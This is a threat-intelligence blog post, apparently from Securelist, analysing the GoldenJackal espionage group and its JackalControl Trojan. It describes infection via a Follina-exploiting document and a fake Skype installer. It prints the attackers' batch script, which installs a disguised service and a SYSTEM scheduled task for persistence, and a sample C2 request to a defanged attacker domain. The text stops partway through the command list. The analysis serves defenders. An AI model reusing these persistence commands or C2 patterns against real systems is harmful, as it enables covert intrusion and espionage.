{"id":109677,"date":"2023-05-23T08:00:02","date_gmt":"2023-05-23T08:00:02","guid":{"rendered":"https:\/\/kasperskycontenthub.com\/securelist\/?p=109677"},"modified":"2023-05-22T14:30:14","modified_gmt":"2023-05-22T14:30:14","slug":"goldenjackal-apt-group","status":"publish","type":"post","link":"https:\/\/securelist.com\/goldenjackal-apt-group\/109677\/","title":{"rendered":"Meet the GoldenJackal APT group. Don’t expect any howls"},"content":{"rendered":"
GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. Despite the fact that they began their activities years ago, this group is generally unknown and, as far as we know, has not been publicly described.

We started monitoring the group in mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher, intended to:

Based on their toolset and the attacker's behaviour, we believe the actor's primary motivation is espionage.

We have limited visibility on their infection vectors, but during our investigations, we observed the usage of fake Skype installers and malicious Word documents.

The fake Skype installer was a .NET executable file named skype32.exe that was approximately 400 MB in size. It was a dropper containing two resources: the JackalControl Trojan and a legitimate Skype for Business standalone installer. This tool was used in 2020.
The other known infection vector was a malicious document that uses the remote template injection technique to download a malicious HTML page, which exploits the Follina vulnerability.

[Figure: Malicious document – first page]

The document was named "Gallery of Officers Who Have Received National And Foreign Awards.docx" and appears as a legitimate circular distributed to collect information about officers decorated by Pakistan's government. It's worth noting that the first description of the Follina vulnerability was published on May 29, 2022 and this document appears to have been modified on June 1, two days after publication, and was first detected on June 2.

The document was configured to load an external object from a legitimate and compromised website:

    hxxps://www.pak-developers[.]net/internal_data/templates/template.html!

[Figure: Code snippet used to load the remote resource]

The remote webpage is a modified version of a public "Proof of Concept" to exploit the Follina vulnerability. The original PoC is available on GitHub. The attacker replaced the IT_BrowseForFile variable value with the following:

[Figure: Code snippet used to exploit the Follina vulnerability]

The decoded string is:

[Figure: Decoded script]

The exploit downloads and executes an executable file hosted on the legitimate compromised website, and stores it in the following path: "%Temp%\GoogleUpdateSetup.exe". The downloaded file is the JackalControl malware.

In other cases, we do not have a real infection vector, but we observed a system compromised during lateral movements.
Specifically, we observed the attacker using the psexec utility to start a malicious batch script:

    cmd /c "c:\windows\temp\install.bat > c:\windows\temp\output.txt"

The batch script performs a variety of actions, such as installing Microsoft .NET Framework 4, infecting the system with the JackalControl Trojan, and collecting information about the system:

    $temp\\dnf4.exe /q /norestart
    tasklist
    sc qc "WEvMngS"
    sc stop "WEvMngS"
    sc delete "WEvMngS"
    sc create "WEvMngS" binpath= "\"$windir\WEvMngS.exe\" /1" displayname= "Windows Event Manager" type= own start= auto"
    sc description "WEvMngS" "Provides event-related methods that register routed events."
    sc start "WEvMngS"
    schtasks /delete /f /tn "\Microsoft\Windows\Diagnosis\Event Manager"
    schtasks /create /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" /xml "$temp\\sch.xml" /ru "NT AUTHORITY\SYSTEM"
    sc qc "WEvMngS"
    schtasks /query /v /fo list /tn "\Microsoft\Windows\Diagnosis\Event Manager"
    tasklist
    netstat -aon
    ping -n 1 google.com
    ipconfig /displaydns
    netsh winhttp show proxy
    reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v

JackalControl

This is a Trojan that allows the attackers to remotely control the target machine through a set of predefined and supported commands. These are received via an HTTPS communication channel facilitated between the malware and the C2 servers, and can instruct the implant to conduct any of the following operations:

During the last few years, the attackers updated this tool multiple times and we observed multiple variants. We are going to describe the latest version, which was observed in January 2023 (8C1070F188AE87FBA1148A3D791F2523).

The Trojan is an executable file that can be started as a standard program or as a Windows service.

It expects an argument, which can be equal to one of the following values:

The malware arguments and the related malware behavior change according to the variants. Some variants offer only two arguments:

Other variants can install themselves with different persistence mechanisms. The malware's execution flow is determined by the arguments provided in the command line with which it is run.

Over the years the attackers have distributed different variants: some include code to maintain persistence, others were configured to run without infecting the system; and the infection procedure is usually performed by other components, such as the batch script mentioned above.

The malware starts its activities by generating a BOT_ID, a unique value used to identify the compromised system. This value is derived from several other host-based values:

- The UUID value obtained from the following WMI query: select * from win32_computersystemproduct
- The machine GUID obtained from the following registry key:
- The list of attached drives, obtained from another WMI query, which in turn allows them to determine the 'SerialNumber' of 'PHYSICALDRIVE0': select * from win32_diskdrive

The collected information is concatenated together in a byte array and then hashed with MD5, which is used as a seed for the creation of the BOT_ID. The algorithm used for the generation of the latter simply sums every two consecutive bytes from the resulting MD5 hash and places the resulting byte (modulus 256) as a single byte of the final BOT_ID. This logic is described in the code snippet below, taken from the malware.

[Figure: Code snippet used to generate the BOT_ID]

The resulting BOT_ID is also used to initialize the DES key and IV, which are then used to encrypt communication with the C2.

The malware communicates using HTTP POST requests where data arguments will be carried in encoded form as part of the request's body. The overall request structure will then appear as follows:

    POST /wp-includes/class-wp-network-statistics.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Content-Type: multipart/form-data; boundary=----2c0272b325864985abf2677460a9b07a
    Accept-Language: en-GB,en;q=0.5
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0, no-cache
    Pragma: no-cache
    Host: finasteridehair[.]com
    Content-Length: 154
    Expect: 100-continue

    ------2c0272b325864985abf2677460a9b07a
    Content-Disposition: form-data; name="adv"
    %ENCODED_DATA%
    ------2c0272b325864985abf2677460a9b07a

A valid response should in turn be formed in the following way:

    <!-- DEBUGDATA::%ENCODED_DATA% -->

The response is decoded with base64: the resulting payload is an array of strings, where the delimiter is the standard Windows new line sequence, "\r\n". Each line is decoded again with base64, decrypted with DES, and decompressed with the GZIP algorithm.

Each command has the following structure:

[Figure: Command structure]

The command type must be equal to one of the following codes: